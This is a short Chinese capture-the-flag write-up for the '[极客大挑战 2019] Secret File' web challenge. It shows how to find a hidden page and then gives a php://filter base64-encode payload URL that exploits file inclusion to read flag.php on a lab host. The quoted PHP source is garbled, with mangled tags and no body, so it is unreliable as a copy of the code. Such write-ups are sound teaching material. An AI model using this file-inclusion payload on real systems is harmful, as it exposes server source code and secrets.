web-[极客大挑战 2019]Secret File

      • 题目要点
      • 题目内容
      • 解题

题目要点

  • PHP伪协议

题目内容

web-[极客大挑战 2019]Secret File_第1张图片

解题

打开页面,F12查看源码,发现一个新页面。访问一下
web-[极客大挑战 2019]Secret File_第2张图片

点一下跳到另一个页面
web-[极客大挑战 2019]Secret File_第3张图片

拦截,发现
web-[极客大挑战 2019]Secret File_第4张图片

访问secr3t.php,发现一段源码

<html>
    <title>secrettitle>
    <meta charset="UTF-8">

html>

可以利用文件包含漏洞(PHP伪协议)构造pyload
http://85435532-2806-4d16-9b44-290434930b87.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
web-[极客大挑战 2019]Secret File_第5张图片

解码
web-[极客大挑战 2019]Secret File_第6张图片

你可能感兴趣的:(web-[极客大挑战 2019]Secret File)